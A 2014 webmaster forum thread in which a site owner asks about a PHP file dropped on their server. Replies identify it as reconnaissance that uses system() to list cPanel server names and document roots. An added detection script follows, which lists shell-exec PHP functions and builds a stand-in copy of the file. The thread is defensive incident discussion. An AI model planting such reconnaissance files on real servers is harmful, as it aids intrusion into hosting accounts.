
Webmaster General Forum

    
Mysterious file on my server
virtualreality




msg:4646965
 7:51 am on Feb 20, 2014 (gmt 0)

Hello, yesterday a mysterious file appeared on my server - sadfsdfsdf.php. The host says they don't know anything about how it happened but I don't trust them because their customer service is really bad. The content of the file is:


<?PHP echo system('FILES=/var/cpanel/userdata/myusernamehere/*;for i in $FILES;do egrep "servername|documentroot" $i | awk \'{print $1,$2}\' | egrep "^servername|^documentroot";echo ;done'); ?>

Can anyone translate what this code means? Many thanks!

 

phranque




msg:4647068
 10:52 am on Feb 20, 2014 (gmt 0)

This script could be used to expose information about your web server configuration.

Essentially it means - print out the first two fields of every row that contains "servername" or "documentroot" in any file in the /var/cpanel/userdata/myusernamehere/ directory.

virtualreality




msg:4647074
 11:16 am on Feb 20, 2014 (gmt 0)

Thanks. Is that something the server people put there and do not want to say they did? Or could it be a hack? If so, what benefit can a hacker have from this info?

lucy24




msg:4647279
 10:45 pm on Feb 20, 2014 (gmt 0)

I can't imagine the server administrators asking for information that they already have. Unless they're testing code-- and they wouldn't do that on some random customer's site!

For the hacker it's a preliminary inquiry. The information itself may or may not be useful; what they really want to know is whether they're able to get the information in the first place.

Hacking comes in many forms. What you've got here is a two-step approach. First comes the data collection, like your file, or checking whether they're able to "PUT" a file. If the first test comes up positive, they'll be back for bigger and nastier ventures.

I assume you removed the file the instant you found it. Did it come back?

phranque




msg:4647311
 12:20 am on Feb 21, 2014 (gmt 0)

Not only that, it tells the hacker you have a cPanel installation, which would allow them to take advantage of a potential cPanel vulnerability.

virtualreality




msg:4647457
 12:48 pm on Feb 21, 2014 (gmt 0)

Yes I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?

lucy24




msg:4647466
 1:31 pm on Feb 21, 2014 (gmt 0)

The host says they don't know anything about how it happened but I don't trust them

:: twiddling thumbs ::

virtualreality




msg:4647471
 1:55 pm on Feb 21, 2014 (gmt 0)

Their exact reply was:

It is important to remember that when it comes to the security of your site, it is your responsibility to make sure that none of the files you upload can be hacked. The server is secure, and I assure that is not how any hacker got in, if that is what happened. If they did get it, it was through your files that you uploaded. It is highly recommended that you determine if this file is intended or not, and then make sure that you always secure your files, to insure that hackers are not able to break in through the files and upload malware. Thank you.

lucy24




msg:4647596
 9:27 pm on Feb 21, 2014 (gmt 0)

They think it's your fault your site got hacked? Well, maybe if your FTP password is "password" and your username* is "user" ...


* Notice how in movies-- the ones where they get the password within three guesses-- they never, ever have to figure out the username first?

Samizdata




msg:4647612
 10:19 pm on Feb 21, 2014 (gmt 0)

I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?

Consider how they got your username and password in the first place.

One obvious possibility is a trojan on your computer.

...

Jonesy




msg:4648386
 10:22 pm on Feb 23, 2014 (gmt 0)

Consider how they got your username and password in the first place.
One obvious possibility is a trojan on your computer.

Another possibility is using the same username and password
in many other sites, and one of them got cracked badly.
Jonesy
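
One way to check a document root for other files like the one in the first post, as an added example that is not part of the thread. The names `find_exec_php` and `make_sample_docroot`, the list of flagged PHP functions and the sample files are all constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the thread): flag PHP files under a document root
# that call PHP functions which pass a string to the operating system shell.
EXEC_FUNCS='system|exec|shell_exec|passthru|popen|proc_open'

# find_exec_php DIR [DAYS]
# Prints "path<TAB>functions" per matching file; DAYS limits the scan to
# files modified within that many days. Heuristic: a match inside a comment
# or string is reported too, so review each hit by hand.
find_exec_php() {
    days=${2:-}
    find "$1" -type f -name '*.[pP][hH][pP]' ${days:+-mtime "-$days"} \
        -exec sh -c '
        funcs=$1; shift
        for f in "$@"; do
            # The leading class skips curl_exec( and method calls ->exec( / ::exec(
            hits=$(grep -Eio "(^|[^[:alnum:]_>:])($funcs)[[:space:]]*\(" "$f" |
                   grep -Eio "$funcs" | tr "[:upper:]" "[:lower:]" |
                   sort -u | paste -sd, -)
            if [ -n "$hits" ]; then printf "%s\t%s\n" "$f" "$hits"; fi
        done' sh "$EXEC_FUNCS" {} +
}

# Constructed sample tree: a shortened stand-in for the dropped script, an old
# admin script that shells out, and two benign files. Prints the temp dir path.
make_sample_docroot() {
    d=$(mktemp -d)
    mkdir -p "$d/blog"
    printf '%s\n' "<?PHP echo system('ls /var/cpanel/userdata/USERNAME'); ?>" > "$d/sadfsdfsdf.php"
    printf '%s\n' '<?php $n = $pdo->exec("DELETE FROM t"); curl_exec($ch); ?>' > "$d/blog/db.php"
    printf '%s\n' '<?php echo "hello"; ?>' > "$d/index.php"
    printf '%s\n' '<?php Exec("uptime"); passthru("df -h"); ?>' > "$d/blog/old.PHP"
    touch -t 201001010000 "$d/blog/old.PHP"   # backdate so a DAYS filter skips it
    echo "$d"
}
```

Running `find_exec_php /path/to/public_html 7` lists only files changed in the last week, which narrows the review to what appeared around the time of the incident.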

WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved